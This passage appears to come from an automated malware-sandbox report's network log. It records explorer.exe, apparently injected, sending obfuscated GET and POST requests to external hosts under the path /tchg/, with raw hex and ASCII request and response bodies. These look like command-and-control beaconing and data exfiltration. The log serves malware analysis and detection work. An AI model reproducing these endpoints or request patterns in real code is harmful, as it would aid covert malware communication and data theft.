4TNVpSOnGMxK7u8wkZgNj9~MvfFgT15R98uWEd2ZNy9JcFMO0xysz4h7aIj9sBmPZ8cOahKJbPG1zj9qcbmId5yQonZQHIsd7mqtCvX7pe87GWgUZqB5n2dVzVFXmyGBQCccEITSudzJpyEAprLINl~cYzSU5bp9NQNRtMx6cl9mA2A7z4PR8rAnCR6UVBZLHWN4O5F2aHPv6S31KsdxorwyVCuWexPuy-er1-sLVZzMaY~B70rmT415izLjsYWYUpFFpAAZdy5q~lHciTdehtO1YHZjbZgWaNMmkXOiRkwJQ5VRqxDpFu5mZxLxBKGH0bMjfc7lt6N5ZDdzJ7XGFXbWXCNeeQhvn05KGW9pbsKGM36GFe11lZteLfdYyvxcmo(1Os2ty6ziVF5LVafuUxlVdP7NzdPGAhARTGo6XYRHHAiich~NHXezcaTkvP8CoC7xUoLRNSvII1l1J0YEA_iUH-Djuf9KoNsuhFhpcB1MpLGLP3~kU_47rqLkN7GWELCzB-BZi0PWuWM-5fH5X5~u(QQVk-BHWshh2CE1mEOEO-InjIMLEDVY(D8JUD0nu53ZeS(Zum6m1PrmUz419EGhc_Z9kB56D-Bbfam7ZrDfjOjIi-aQRmMKZqDYrskUGVK3XPFLxIU4gJGdNmBEMB8II5BPH6CnU5Sg7ivAXospUIGb9vs29TU2rQSgpcxWpUARFqy6GWOWltUbCoA070WlQydNSX~B5UUgTiS4zi6xFZRSG711DhDoaBg7zb8pmd6YVWhBcVmPWMfJai3Q9u00EIofHnwwQFzW~QyCkXJyHHfYGYz1C8f5QbdHuyKMVAGlQaZGzBoVtaF1XKpOCiwsxUvZ43f4asr57W3_K8jGpUfrw2rYTNFJo2b1hiDmnM3jukIaaR46psIjyHyGq_tLwMrZIersW7nC0JOPh-coC3krU5pIXVdx~WUcr0kFzd9Yug0plGjcObSla3NQvGbrv-mDSJ73WDWG7V0EtC3u(jgz1v7zsxGXue2kUz3uuzcooEjCkucKYlGOURlYD-9Kozp8hzaHAYXHuvA-FuUTQ4C9CbBBgFzEEziefUSoek6jSRZlb9XpYH66KQRZiztUNEkNg-Tp8PthmnRBSTm2dc7_OMyWwP6EEspU8bFJMTfyCvV6RSyH6dglap7dpYZsXZyvPiML~rTQIm7zdSLHRjmZYIYZjTefy3XlTFkGuNkkxJJkIT89n3qvTWoEI_m93_rQyjP9s3kSW_2gjLwgDAHKAaB5UXXUYs~_4ecfmRRAwLUE1MqajJ0sF83rVhwNF9qKszdolxQQRyVlzM1tAOIY2QrqKNHz(oRYbbt51M~mgOMTQp2bW0SaCyKfQiu33qas5eL6ZiURv2rb(Flzn8FxCyyOSu4yyVZcvLY2GiW0ry1vFhJqMITrvbTNH-Mxh5LnNLIx686B70Y2sWycq09rK-BBrADn2ytstgEAyeqSN-vu7ubIMWbZmgmE1f6AsnBXoUZycrULmmNsxMy6RxtNPVKESFazLZD9hHIrjVwnzGMtBfqOTC~pOfVCCM5t5i(hYBdoj_WIucfF0J4Vs4y-hv0ptZnhGFpNivudl0yiO6wyQP~GTuqViGlu~chJiaF3f-DgaaZVsmTv(SbkhCQ6huDwlkh5lfnXLjSEnJTobULPzGsMVY3SDIMkthejcM685plGkaxjOChZ4BbJXeu2vq3n8-ZLUIthwCxP9_1JD5xF4JxaJ_VMMmv-GGNLgBbjWGNa(Jn92AqaGEyPAcpTRyK7j2ggQWBO2Sb0oLorC1(dycCD~Pqf11MIFnucoO4pB3U5NwjcIipCS1kNYSE0(C2R6pdpW9fwjV0A7E0rD7rBIKwbYtmlhNV6vcrkENvjl5TKmv4rybG68Zo86tRprudW4ZCcsF7UZZLiKpCTPSwAjMcSKqoBZ9YJSpc-radGS3Jq9YY6g3GWAHLp1SszAWaloPyktKWOBPYO5M1lsuL8NIsLE_9oMhKaHmbPJDdwNuKCoSWVPslUxUkRCcPGrqTAWLlY2nKFq6VJG43Pmlz-WBycVHhz5t0xKJXZQWlA4-90MI(7rDD-5FLo3UrKDEHYfP4El3xINlTJTBpHhdoStd2GQU(O1ZVVGNuKC2ulKCcO8dAuHhk9yLSMZ1gwtNvjhwo_IaEuG87av7ZdthQnoSFMYw2nm_jaP3gekxNcIsg-QjOfr06VGP3l1hc6K-Wx3PjvPRgQHk0xPXc9uN8DQUsDI1NwmCcGV5As9sOzXnYD(XGvMaicyZljKeXeqF1HnWiQ1GHkZMHCuklMRwTiErLZTDxV(008qyeHiPFKdIjCCxdnUSZfDgHhovUPyRCqE-SXn72N(5ln0xSBzGw97szdz-7pAE4ixYtCgGNJMDF-YOnqNh
                                                                                                                    May 30, 2023 11:08:14.147660017 CEST293INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                                                                                                                    May 30, 2023 11:08:14.147782087 CEST298OUTData Raw: 66 47 6e 33 70 38 69 74 77 6d 5a 38 42 4e 62 32 37 32 75 71 75 53 36 43 42 28 58 38 46 73 5a 35 4c 67 6f 33 5a 65 51 43 49 4a 35 5a 5f 72 6b 52 6f 4d 61 68 7a 69 6e 7e 33 43 77 51 74 54 72 33 39 46 57 41 30 50 5a 4e 41 31 47 4a 42 4d 74 6b 4d 70
                                                                                                                    Data Ascii: fGn3p8itwmZ8BNb272uquS6CB(X8FsZ5Lgo3ZeQCIJ5Z_rkRoMahzin~3CwQtTr39FWA0PZNA1GJBMtkMpEbFrz8p~tx_T3OLZIAnPtnywsgVgWMcG1lf7DjjeJcnKRONYIVdFIpSWal856jwTCKWYBkhcRmzQfEBA9r-gjMvGleJYznHk5yBONdMLt~cI5cqSD5RS9nd(wjhPcjOh7oPF0GM3feRoS9S2vmUXQzpgWIviQo23W
                                                                                                                    May 30, 2023 11:08:14.148173094 CEST311OUTData Raw: 76 54 5a 75 51 44 52 7a 35 41 79 30 78 49 76 43 35 57 53 36 5a 70 33 6c 51 44 4b 5a 4f 30 71 6a 2d 6a 67 43 6c 35 4a 46 2d 32 38 57 5a 32 55 47 4f 6d 6d 53 42 46 6c 43 4b 52 64 47 4b 53 32 70 2d 57 6a 7e 42 67 7a 53 75 39 67 54 56 44 4b 4b 59 31
                                                                                                                    Data Ascii: vTZuQDRz5Ay0xIvC5WS6Zp3lQDKZO0qj-jgCl5JF-28WZ2UGOmmSBFlCKRdGKS2p-Wj~BgzSu9gTVDKKY1ZAPS4c_L1Qsd9ZALeebq_iAR4rfRGYkkPYQedvJ7ecMOIYlu081AvBPc_GJcyJGuzUnBbxWeGpOeC~4jFViEra22XmChJIIwbdsm9Zgnp59W0rQWcY07ON3HfvB8kZ8KCBB0ACN~mj96_gA2wr_McT15jlrHkzR6d
                                                                                                                    May 30, 2023 11:08:14.148216009 CEST316OUTData Raw: 6a 38 62 73 67 70 45 4c 6a 79 6e 6d 68 6d 62 77 61 47 35 53 42 34 78 47 5a 79 35 57 63 37 58 43 30 73 48 64 35 44 4b 64 5f 67 37 4c 30 36 54 46 63 78 6c 6b 70 43 6a 73 75 36 68 67 51 7a 4b 4f 4a 55 74 45 42 6b 78 49 6f 61 37 4b 31 78 5f 28 51 4c
                                                                                                                    Data Ascii: j8bsgpELjynmhmbwaG5SB4xGZy5Wc7XC0sHd5DKd_g7L06TFcxlkpCjsu6hgQzKOJUtEBkxIoa7K1x_(QLU0m4GRxcj1RqhlL3M3YxVv2JWwgjMsao1LcNW~kpTehCOWixvzaciyI7UL4bqTlOGwmESdQ9w1XowFxzS(924afbWbadv(Tw_jbEnDKDDV0tIxl13PaRQNaMHYubIqLo0cZ(uDn(Wg-xtYXbMMhBfaCl9uK5qTVil
                                                                                                                    May 30, 2023 11:08:14.148263931 CEST319OUTData Raw: 63 77 77 6d 45 61 4f 63 65 7e 38 30 6c 77 52 6a 4d 46 55 47 77 63 32 64 4f 32 57 28 51 46 76 42 66 41 53 31 7a 55 39 44 76 47 62 64 55 56 79 52 74 33 75 45 50 77 31 4f 6c 70 5f 56 46 66 55 33 43 47 49 39 4b 45 49 4f 51 52 43 4a 52 78 4b 65 4d 73
                                                                                                                    Data Ascii: cwwmEaOce~80lwRjMFUGwc2dO2W(QFvBfAS1zU9DvGbdUVyRt3uEPw1Olp_VFfU3CGI9KEIOQRCJRxKeMsi982z(mddcuir(zjgpw8ISS2hFky2ka6cLMNEGieEiTkUD58ZgC(qo59DsxduM_SePQmlsarHvuirJDxeRo9RVHMgBlusynFJbwun5IapUwf1h7VbVtv-SshjkQDh8qkklAR1zlpDyL5lf9xxh5tnZ_qAyy2cSrp_
                                                                                                                    May 30, 2023 11:08:14.167078018 CEST324OUTData Raw: 68 35 6c 72 58 7e 39 55 49 64 4b 51 69 53 35 33 55 6e 6f 67 6d 47 73 67 74 63 6a 51 67 65 5f 76 47 37 6a 46 64 71 52 47 35 65 37 71 36 52 63 52 43 7e 47 36 4e 48 33 6f 4a 76 75 68 4e 45 61 49 56 4a 72 32 4c 34 6d 4e 42 74 6e 47 69 73 69 55 5a 64
                                                                                                                    Data Ascii: h5lrX~9UIdKQiS53UnogmGsgtcjQge_vG7jFdqRG5e7q6RcRC~G6NH3oJvuhNEaIVJr2L4mNBtnGisiUZdToRt_kdMXoYrQVTRaOzXacj4zRuhmkkEeV1WnHZ3auxp7enUR0nKKqc3ZlrJnFXJ-evieovjtrLn6rpPxvmRj~5ZvrYU8ZZD5B1Gf788lVAs7i0mwRQB7ykt63vclK1gq2E64LAR_SDqnX8oGiGanLhex7VqeECO5
                                                                                                                    May 30, 2023 11:08:14.167247057 CEST332OUTData Raw: 4b 6c 36 42 41 72 33 6c 47 38 35 54 61 6a 62 79 38 4b 76 70 4d 56 4b 57 6a 32 70 51 58 52 6a 4c 73 36 6c 6f 68 54 71 50 54 44 69 67 65 64 64 4e 51 31 59 7e 49 65 4f 72 4e 4b 63 4c 42 47 6e 30 50 73 75 66 31 33 37 4b 70 49 45 41 39 34 49 33 75 37
                                                                                                                    Data Ascii: Kl6BAr3lG85Tajby8KvpMVKWj2pQXRjLs6lohTqPTDigeddNQ1Y~IeOrNKcLBGn0Psuf137KpIEA94I3u7pNJ7vFU~FggMReVC3KBB6Z1wGOHP5mnNi(BOPpjDHdemI6uVI6s3Mz0UsWOeNR5Bl4fAhHulMf1BUQFYPeRkoTaY33A~dP8QDm9dNScwldEzYSZIM5a7RSjNvi5ZNCL9ByZXVXCxJF917R2evbvUCu5La5MLEgz9H


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    50192.168.11.204980989.31.143.180C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:43.431622028 CEST1047OUTGET /tchg/?O0qEM=k2D3DblF7vL6SN+gu0l7QPzZCDmxseSx80MfaI1OtzxPgAvg61Sn0PlLCTFPQNSP+C41MomAw+jmeQI9bGxtvb+gFV+DCXaP5w==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.solarwachstum.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:10:43.444339991 CEST1047INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:10:43 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 6637
                                                                                                                    Last-Modified: Thu, 21 Jan 2021 10:26:32 GMT
                                                                                                                    Connection: close
                                                                                                                    ETag: "600956d8-19ed"
                                                                                                                    Server: UD Forwarding 3.1
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    May 30, 2023 11:10:43.444375992 CEST1048INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description" content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,h
                                                                                                                    May 30, 2023 11:10:43.444410086 CEST1049INData Raw: 70 45 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70
                                                                                                                    Data Ascii: pEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCP
                                                                                                                    May 30, 2023 11:10:43.444574118 CEST1051INData Raw: 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34 7a
                                                                                                                    Data Ascii: 7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA
                                                                                                                    May 30, 2023 11:10:43.444610119 CEST1052INData Raw: 64 30 6e 6b 47 32 58 4f 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f 7a
                                                                                                                    Data Ascii: d0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC);overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#log
                                                                                                                    May 30, 2023 11:10:43.444638014 CEST1053INData Raw: 6c 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72
                                                                                                                    Data Ascii: llt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihre
                                                                                                                    May 30, 2023 11:10:43.444663048 CEST1054INData Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72
                                                                                                                    Data Ascii: rel="nofollow noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    51192.168.11.2049810154.84.88.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:50.020633936 CEST1055OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.ep09.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.ep09.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.ep09.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 5a 35 73 7a 65 74 65 6d 48 56 31 46 64 76 63 66 4f 42 32 65 79 67 61 37 6d 44 30 73 6e 65 6f 45 48 69 4c 42 66 6c 30 4d 78 59 56 71 75 78 30 62 34 5a 71 4c 62 56 59 33 59 4d 39 50 39 4e 42 69 28 78 5a 71 47 4f 65 53 42 77 6f 4b 33 76 35 59 35 42 73 39 73 34 63 7a 7a 57 51 49 6f 4a 45 76 6b 66 50 48 64 41 6c 76 68 70 6f 58 46 52 4f 64 4e 63 67 55 28 2d 58 67 67 54 68 4a 61 69 51 6a 55 4b 32 75 31 45 31 53 77 59 44 74 75 51 4b 67 34 43 52 38 73 6c 73 4d 61 5a 4e 61 6a 52 35 6a 6c 50 76 37 77 39 4e 36 39 49 34 52 53 35 41 45 65 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=Z5szetemHV1FdvcfOB2eyga7mD0sneoEHiLBfl0MxYVqux0b4ZqLbVY3YM9P9NBi(xZqGOeSBwoK3v5Y5Bs9s4czzWQIoJEvkfPHdAlvhpoXFROdNcgU(-XggThJaiQjUK2u1E1SwYDtuQKg4CR8slsMaZNajR5jlPv7w9N69I4RS5AEeQ).
                                                                                                                    May 30, 2023 11:10:50.356134892 CEST1055INHTTP/1.1 400 Bad Request
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:10:50 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    52192.168.11.2049811154.84.88.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:52.777693987 CEST1057OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.ep09.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.ep09.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.ep09.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 5a 35 73 7a 65 74 65 6d 48 56 31 46 65 4f 4d 66 4e 69 65 65 7e 51 61 36 70 6a 30 73 7e 4f 6f 49 48 69 48 42 66 6b 41 63 78 72 78 71 76 51 45 62 35 63 47 4c 61 56 59 33 54 73 38 45 35 4e 42 72 28 78 46 59 47 4b 65 53 42 30 34 4b 32 64 78 59 28 78 73 69 34 6f 63 79 30 57 51 4a 73 4a 45 6c 6b 66 44 78 64 42 78 76 68 34 30 58 66 53 32 64 4a 4a 4d 58 34 65 58 69 30 6a 68 49 54 43 51 58 55 4b 36 4d 31 41 30 76 7a 75 7a 74 75 30 47 67 71 53 52 6a 6b 56 73 48 54 35 4d 33 6e 68 63 76 72 64 58 63 67 49 42 36 6c 36 56 7a 66 4b 42 37 45 38 31 39 55 32 70 57 48 4f 64 35 74 49 79 5f 56 69 4c 72 67 53 58 78 71 4d 74 4a 6f 69 57 46 67 5a 6c 46 4f 66 37 31 38 71 39 54 4b 34 38 50 73 67 4f 6e 65 6e 30 4a 48 77 54 73 45 72 68 73 43 36 78 56 6c 63 58 53 78 72 62 54 7e 54 43 7a 34 6d 38 79 74 5f 4c 6b 47 57 42 53 6c 68 79 32 4b 36 4e 79 34 6d 43 2d 6a 65 30 36 6d 5f 48 4c 52 6e 45 71 73 75 6f 39 30 47 57 6f 50 55 48 58 31 67 59 43 53 76 53 67 78 49 73 6c 72 66 31 79 32 61 68 53 64 69 45 6c 4d 70 33 48 52 5f 56 68 44 44 7e 6c 34 67 4e 56 5a 4c 6b 30 4c 2d 6d 55 31 6d 77 77 75 64 73 71 59 6e 31 4e 79 78 42 78 74 37 4c 45 6b 78 56 55 37 30 33 42 37 59 34 59 77 7a 68 74 6d 72 53 57 67 47 30 71 55 56 35 70 66 68 5a 5f 50 48 4d 36 43 4d 31 4f 4f 65 28 66 66 58 53 4b 52 6b 4b 4a 31 33 37 43 49 47 33 41 62 31 7e 54 65 72 7a 5a 4b 5f 70 2d 43 4a 38 42 6b 44 6d 75 63 33 4e 2d 41 42 69 36 39 72 37 48 51 34 77 62 55 32 42 2d 77 4c 51 66 46 32 49 7a 71 49 32 6c 43 68 47 36 7e 39 77 6a 45 74 32 5a 63 75 6d 76 37 61 4c 73 5a 78 48 61 28 30 31 4d 4b 73 79 69 61 77 51 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=Z5szetemHV1FeOMfNiee~Qa6pj0s~OoIHiHBfkAcxrxqvQEb5cGLaVY3Ts8E5NBr(xFYGKeSB04K2dxY(xsi4ocy0WQJsJElkfDxdBxvh40XfS2dJJMX4eXi0jhITCQXUK6M1A0vzuztu0GgqSRjkVsHT5M3nhcvrdXcgIB6l6VzfKB7E819U2pWHOd5tIy_ViLrgSXxqMtJoiWFgZlFOf718q9TK48PsgOnen0JHwTsErhsC6xVlcXSxrbT~TCz4m8yt_LkGWBSlhy2K6Ny4mC-je06m_HLRnEqsuo90GWoPUHX1gYCSvSgxIslrf1y2ahSdiElMp3HR_VhDD~l4gNVZLk0L-mU1mwwudsqYn1NyxBxt7LEkxVU703B7Y4YwzhtmrSWgG0qUV5pfhZ_PHM6CM1OOe(ffXSKRkKJ137CIG3Ab1~TerzZK_p-CJ8BkDmuc3N-ABi69r7HQ4wbU2B-wLQfF2IzqI2lChG6~9wjEt2Zcumv7aLsZxHa(01MKsyiawQ.
                                                                                                                    May 30, 2023 11:10:53.096956968 CEST1057INHTTP/1.1 400 Bad Request
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:10:53 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    53192.168.11.2049812154.84.88.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:10:55.545268059 CEST1070OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.ep09.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.ep09.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.ep09.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 5a 35 73 7a 65 74 65 6d 48 56 31 46 65 4f 4d 66 4e 69 65 65 7e 51 61 36 70 6a 30 73 7e 4f 6f 49 48 69 48 42 66 6b 41 63 78 72 35 71 76 6a 63 62 34 5f 7e 4c 64 56 59 33 50 63 38 48 35 4e 41 70 28 78 64 63 47 4b 54 76 42 79 6b 4b 32 50 4a 59 28 48 51 69 79 49 63 78 37 32 51 58 6f 4a 45 50 6b 66 50 6c 64 42 6b 55 68 70 77 58 46 51 7e 64 4f 36 30 55 35 4f 58 67 30 6a 67 4a 58 43 51 31 55 4b 28 4a 31 46 73 76 7a 6f 37 74 38 78 61 67 6f 6b 5a 6a 28 56 73 49 63 5a 4d 30 70 78 63 47 72 63 7a 69 67 49 41 42 6c 37 52 7a 66 4e 64 37 46 39 30 72 55 57 70 57 5a 65 64 36 7e 59 75 37 56 6d 72 4e 67 54 6a 78 71 4c 52 4a 6f 43 57 46 6b 37 4e 47 4a 5f 37 7a 34 71 38 46 41 5a 41 48 73 67 79 4e 65 6a 34 4a 47 41 33 73 4c 38 31 73 41 59 5a 56 35 73 58 51 31 72 62 41 33 7a 44 69 34 6d 73 49 74 5f 71 54 47 52 42 53 6b 41 7e 32 59 76 68 39 78 6d 43 30 74 2d 31 2d 31 76 4c 50 52 6e 55 32 73 75 6f 54 30 46 61 6f 49 6b 33 58 30 68 59 42 53 5f 54 71 6f 34 73 77 79 76 35 43 32 61 39 4b 64 69 4e 39 4d 71 62 48 53 66 56 68 47 6b 71 36 69 67 4e 53 58 62 6c 7a 47 65 6d 50 31 6d 30 47 75 63 59 51 59 58 5a 4e 79 46 6c 78 6e 4c 4c 4c 32 42 56 59 6f 55 33 48 28 59 34 59 77 7a 6c 66 6d 72 4f 57 68 32 4d 71 56 6e 68 70 50 43 42 5f 4e 48 4d 77 43 4d 31 66 4f 65 43 30 66 58 61 30 52 6c 61 76 31 30 58 43 49 58 6e 41 61 48 57 53 4a 62 7a 59 4f 5f 70 70 47 4a 77 77 6b 43 4b 32 63 33 64 49 42 32 61 36 38 71 4c 48 55 34 77 59 46 6d 42 35 7a 4c 51 4e 42 32 45 5f 71 49 37 53 43 67 43 71 7e 5f 77 6a 46 5a 76 39 59 4f 7e 47 35 6f 4c 64 5a 48 44 55 28 30 4e 77 65 4f 4b 6a 49 42 55 30 73 36 71 61 48 31 35 5a 58 37 74 5a 50 58 32 75 6e 67 44 38 5a 6d 44 67 45 2d 32 54 63 4e 56 71 28 77 50 4a 70 76 76 76 30 58 39 42 77 57 35 73 5a 37 73 78 34 5f 6e 56 31 4a 4c 76 64 76 71 6c 49 73 65 54 34 64 59 44 70 65 33 71 51 43 51 35 72 38 67 55 63 30 6f 64 42 42 74 75 49 31 36 44 45 56 75 39 4e 35 6a 71 44 75 32 7a 67 77 35 6e 48 5a 44 6b 4e 4c 6d 75 63 36 53 62 65 4b 71 2d 73 78 72 62 34 30 4a 74 4e 36 62 31 4e 4e 44 61 4d 4e 49 61 35 54 4a 4d 66 2d 5a 71 4c 4c 58 6c 72 6a 44 71 65 64 78 2d 7e 58 53 56 66 34 6a 4e 32 6e 35 76 6e 5a 73 73 45 37 41 6c 43 51 77 34 44 6a 4c 5f 68 34 68 77 6b 53 52 79 7a 31 6d 38 41 66 44 31 34 44 56 56 67 42 34 32 45 6b 76 37 65 68 52 50 76 75 34 31 46 5f 54 6b 59 65 51 4e 37 64 6e 6f 64 66 58 54 58 45 46 57 42 6c 34 35 6c 34 7a 79 74 56 32 6b 41 2d 78 5a 49 44 7a 67 42 33 56 5f 32 4c 35 72 7a 4d 64 68 58 4e 7a 49 53 33 55 77 71 78 30 54 33 2d 68 45 68 37 42 49 4b 64 61 4a 37 42 4f 45 67 6b 64 47 6e 32 7e 33 50 2d 44 56 61 59 43 74 54 6b 68 71 6a 70 36 33 63 46 77 63 28 54 70 61 47 68 59 75 56 45 76 59 4d 76 44 71 43 4d 44 4e 44 4c 6a 78 6d 5f 28 44 53 66 6c 77 61 30 79 6c 4c 78 4c 4d 37 65 75 45 58 62 28 39 65 4f 4f 51 48 71 31 43 74 79 68 32 6e 63 6a 56 38 34 4d 6b 46 6a 7a 41 30 77 59 61 37 35 32 67 53 4e 66 56 31 4b 68 38 30 48 4e 48 45 44 4c 42 74 6c 6b 43 41 6f 74 7a 34 74 33 58 58 67 55 42 72 32 59 6e 